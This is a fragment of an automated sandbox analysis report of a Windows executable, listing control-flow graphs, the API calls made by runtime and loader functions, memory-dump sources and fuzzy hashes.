GetConsoleMode 785->790 787->771 792 7ff69f3faf59-7ff69f3faf71 787->792 795 7ff69f3fb14d-7ff69f3fb156 GetLastError 789->795 796 7ff69f3fb059-7ff69f3fb061 789->796 790->784 797 7ff69f3fafd5-7ff69f3fafdd 790->797 792->771 802 7ff69f3faf73-7ff69f3faf7f 792->802 793->798 794->769 799 7ff69f3fb173-7ff69f3fb176 795->799 800 7ff69f3fb158-7ff69f3fb16e call 7ff69f3f43f4 call 7ff69f3f43d4 795->800 796->795 804 7ff69f3fb067 796->804 797->789 806 7ff69f3fafdf-7ff69f3fb001 ReadConsoleW 797->806 801 7ff69f3fb013-7ff69f3fb01d call 7ff69f3f9c58 798->801 812 7ff69f3fb17c-7ff69f3fb17e 799->812 813 7ff69f3fb009-7ff69f3fb00b call 7ff69f3f4368 799->813 800->798 801->753 802->771 811 7ff69f3faf81-7ff69f3faf83 802->811 815 7ff69f3fb06e-7ff69f3fb083 804->815 807 7ff69f3fb003 GetLastError 806->807 808 7ff69f3fb022-7ff69f3fb02c 806->808 807->813 808->815 811->771 820 7ff69f3faf85-7ff69f3faf95 811->820 812->801 813->798 815->801 822 7ff69f3fb085-7ff69f3fb090 815->822 820->771 825 7ff69f3fb092-7ff69f3fb0ab call 7ff69f3fa984 822->825 826 7ff69f3fb0b7-7ff69f3fb0bf 822->826 831 7ff69f3fb0b0-7ff69f3fb0b2 825->831 827 7ff69f3fb0c1-7ff69f3fb0d3 826->827 828 7ff69f3fb13b-7ff69f3fb148 call 7ff69f3fa7c4 826->828 832 7ff69f3fb0d5 827->832 833 7ff69f3fb12e-7ff69f3fb136 827->833 828->831 831->801 836 7ff69f3fb0da-7ff69f3fb0e1 832->836 833->801 837 7ff69f3fb0e3-7ff69f3fb0e7 836->837 838 7ff69f3fb11d-7ff69f3fb128 836->838 839 7ff69f3fb103 837->839 840 7ff69f3fb0e9-7ff69f3fb0f0 837->840 838->833 842 7ff69f3fb109-7ff69f3fb119 839->842 840->839 841 7ff69f3fb0f2-7ff69f3fb0f6 840->841 841->839 843 7ff69f3fb0f8-7ff69f3fb101 841->843 842->836 844 7ff69f3fb11b 842->844 843->842 844->833
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 26238c2e26fe11b5dd28e2edceea188fc7e899d5cf6690fdc612c94b7bf022f2
                                                                                                                                                                                                                                                    • Instruction ID: c83e377951f5485fca25b3402264ad94cbd644d76d92c15fca4da126f3d41622
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26238c2e26fe11b5dd28e2edceea188fc7e899d5cf6690fdc612c94b7bf022f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74C10562A1C78791FBB09B1594002BE3B50FB90B94F5701B9DA4E8B792CF7DE855A380
                                                                                                                                                                                                                                                    Function 00007FF69F3E33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF69F3E3534), ref: 00007FF69F3E3411
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E29E0: GetLastError.KERNEL32(?,?,?,00007FF69F3E342E,?,00007FF69F3E3534), ref: 00007FF69F3E2A14
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E29E0: FormatMessageW.KERNEL32(?,?,?,00007FF69F3E342E), ref: 00007FF69F3E2A7D
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E29E0: MessageBoxW.USER32 ref: 00007FF69F3E2ACF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                    • API String ID: 517058245-2863816727
                                                                                                                                                                                                                                                    • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                                                    • Instruction ID: 502699e74076f42befbc5b2bf4aad573224626880b3aec74964ecbd50d99dec1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C821B621F1C54392FB31AB25E8013B92350FF58784F8202BAD65DCB6D6EE6CE908CB40
                                                                                                                                                                                                                                                    Function 00007FF69F3FEC9C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1022 7ff69f3fec9c-7ff69f3fecd8 1023 7ff69f3fee8e-7ff69f3fee99 call 7ff69f3f43f4 1022->1023 1024 7ff69f3fecde-7ff69f3fece7 1022->1024 1030 7ff69f3fee9d-7ff69f3feeb9 call 7ff69f3eb870 1023->1030 1024->1023 1025 7ff69f3feced-7ff69f3fecf6 1024->1025 1025->1023 1027 7ff69f3fecfc-7ff69f3fecff 1025->1027 1027->1023 1029 7ff69f3fed05-7ff69f3fed16 1027->1029 1031 7ff69f3fed40-7ff69f3fed44 1029->1031 1032 7ff69f3fed18-7ff69f3fed21 call 7ff69f3fec40 1029->1032 1031->1023 1036 7ff69f3fed4a-7ff69f3fed4e 1031->1036 1032->1023 1039 7ff69f3fed27-7ff69f3fed2a 1032->1039 1036->1023 1038 7ff69f3fed54-7ff69f3fed58 1036->1038 1038->1023 1040 7ff69f3fed5e-7ff69f3fed6e call 7ff69f3fec40 1038->1040 1039->1023 1042 7ff69f3fed30-7ff69f3fed33 1039->1042 1045 7ff69f3fed70-7ff69f3fed73 1040->1045 1046 7ff69f3fed77 call 7ff69f4054a4 1040->1046 1042->1023 1044 7ff69f3fed39 1042->1044 1044->1031 1045->1046 1047 7ff69f3fed75 1045->1047 1049 7ff69f3fed7c-7ff69f3fed93 call 7ff69f4048a8 1046->1049 1047->1046 1052 7ff69f3feeba-7ff69f3feecf call 7ff69f3f9c10 1049->1052 1053 7ff69f3fed99-7ff69f3feda4 call 7ff69f4048d8 1049->1053 1053->1052 1058 7ff69f3fedaa-7ff69f3fedb5 call 7ff69f404908 1053->1058 1058->1052 1061 7ff69f3fedbb-7ff69f3fee4f 1058->1061 1062 7ff69f3fee51-7ff69f3fee6d 1061->1062 1063 7ff69f3fee89-7ff69f3fee8c 1061->1063 1064 7ff69f3fee84-7ff69f3fee87 1062->1064 1065 7ff69f3fee6f-7ff69f3fee73 1062->1065 1063->1030 1064->1030 1065->1064 1066 7ff69f3fee75-7ff69f3fee80 call 7ff69f4054e8 1065->1066 1066->1064
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4170891091-0
                                                                                                                                                                                                                                                    • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                                                                    • Instruction ID: 1c82c87508de5fada91a4fd8b649b958963796efbd8842e6ae00397a6b8e0235
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB51F472F042118AFB74DF64A9416BC37A1EB24358F160179DD1E9ABE5DF3CA5818780
                                                                                                                                                                                                                                                    Function 00007FFDFFC36110 Relevance: 6.1, APIs: 4, Instructions: 129COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2077104143.00007FFDFFC21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDFFC20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077076397.00007FFDFFC20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077231574.00007FFDFFD0F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077261971.00007FFDFFD12000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ffdffc20000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$__security_init_cookie
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2222513578-0
                                                                                                                                                                                                                                                    • Opcode ID: d32f32be829c345f8424b6e50172c33a4feb856c6a1ec6dc64b44a65f2bf0592
                                                                                                                                                                                                                                                    • Instruction ID: 100f94c6d569226b75786766b67bbab7066574cce1325ca28d84183c4898473d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d32f32be829c345f8424b6e50172c33a4feb856c6a1ec6dc64b44a65f2bf0592
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20514420B0C22342FB58A765B9F4D7D23919F497E0F194734D8BE476DFDE2DA885A240
                                                                                                                                                                                                                                                    Function 00007FF69F3F4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2780335769-0
                                                                                                                                                                                                                                                    • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                                                                                    • Instruction ID: fc8df68b7f89c7339eb657fc717001496d30c24511a85966603ae865ecd39211
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E519D22A086418AFBA4DF72D4403BD37A1EB58B58F269179DE49CB789DF3CD4819780
                                                                                                                                                                                                                                                    Function 00007FF69F3F4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279662727-0
                                                                                                                                                                                                                                                    • Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                                                                    • Instruction ID: 5809077aa21dcc2964b791871fd141b3b22c340bdbd6b84ed2658088b6707a69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E41D522E1878283F7A08B61D5003797360FBA47A4F219379E69C8BAD1DF7CA1E09740
                                                                                                                                                                                                                                                    Function 00007FFDFFC3CA40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FFDFFC2DCF0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFDFFC334C9,?,?,?,00007FFDFFC739B1,?,?,?,?,00007FFDFFC378EA,?,?,?), ref: 00007FFDFFC2DD38
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FFDFFC3F39E,?,?,?,?,?,00007FFDFFC3F0A6), ref: 00007FFDFFC75B8C
                                                                                                                                                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,00007FFDFFC3F39E,?,?,?,?,?,00007FFDFFC3F0A6), ref: 00007FFDFFC75BA2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2077104143.00007FFDFFC21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDFFC20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077076397.00007FFDFFC20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077184704.00007FFDFFCD5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077231574.00007FFDFFD0F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2077261971.00007FFDFFD12000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ffdffc20000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressAllocCountCriticalHeapInitializeProcSectionSpin
                                                                                                                                                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                                                                    • API String ID: 1188775705-3084827643
                                                                                                                                                                                                                                                    • Opcode ID: d50c9835e02574957e0a21de02abdf2f731f597d5daf9e2beef02907001a061a
                                                                                                                                                                                                                                                    • Instruction ID: 98f40ae3f1222aa465be6f9a61918ebc4f29a48a04539f9097cd6a6556a9c9bb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d50c9835e02574957e0a21de02abdf2f731f597d5daf9e2beef02907001a061a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44418D26B18B5682EB149B19F4A4A7D33A0EB44BA0F484735DB7D477C8DF3CE4568340
                                                                                                                                                                                                                                                    Function 00007FF69F3EBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3251591375-0
                                                                                                                                                                                                                                                    • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                                    • Instruction ID: a87388c7a6405523a930bfd1fdb3c26e76c1af53e27c5b79a6f9c327825b7dbd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88311721A0924242FA75AB7495113FD1381EF517C8F4604BCEA4ECF2D7DE6DAD45C781
                                                                                                                                                                                                                                                    Function 00007FF69F3F8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                    • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                    • Instruction ID: 884fdfd369f77ec2f841d7a38b4e9ea261aa4b13cb133b56e7c9b6fa48af330f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52D06710B1870686FBBC3B70595917913119F68B41B1615BCE84ACA393CD6CA81D5394
                                                                                                                                                                                                                                                    Function 00007FF69F3EF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                                                                    • Instruction ID: e9d8e8dea5dc8616c4880770c68fd197c435fba2716c3286984c4bcda1bdeda0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D551F962B1968247FB789E36940067A6391FF44BB8F164778DD6D8B7D5CEBCD8008A80
                                                                                                                                                                                                                                                    Function 00007FF69F3FB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076202952.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076263216.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076293890.00007FF69F423000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000012.00000002.2076350931.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_18_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                                    • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                    • Instruction ID: e6dcf06491b099a410b8db372d7c1bb8a79114ecf14403ab4ca7f307781a1cd8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A711C4A1608A8281EB608B25F5041697761EB44FF4F694375EE7D8BBEACE7CD0508780
                                                                                                                                                                                                                                                    Function 00007FF69F3F4C34 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69F3F4B49), ref: 00007FF69F3F4C67
                                                                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69F3F4B49), ref: 00007FF69F3F4C7D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000012.00000002.2076226514.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
